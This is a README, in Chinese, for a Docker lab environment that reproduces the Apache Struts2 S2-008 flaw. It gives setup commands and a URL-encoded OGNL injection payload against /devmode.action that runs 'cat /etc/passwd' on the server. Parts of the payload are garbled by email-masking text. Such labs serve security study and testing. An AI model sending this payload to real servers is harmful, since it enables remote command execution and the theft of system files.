forked from Medicean/VulApps
-
Notifications
You must be signed in to change notification settings - Fork 0
/
README.md
37 lines (22 loc) · 1.07 KB
/
README.md
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
## Struts2 S2-008 漏洞环境
### 漏洞信息
* [S2-008 公告](http://struts.apache.org/docs/s2-008.html)
参考 [http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html](http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html)
### 获取环境:
1. 拉取镜像到本地
```
$ docker pull medicean/vulapps:s_struts2_s2-008
```
2. 启动环境
```
$ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-008
```
> `-p 80:8080` 前面的 80 代表物理机的端口,可随意指定。
### 使用与利用
访问 `http://你的 IP 地址:端口号/`
#### Exp
命令执行
```
/devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27cat /etc/passwd%27%29.getInputStream%28%29%29)
```
![](s2-008-1.png)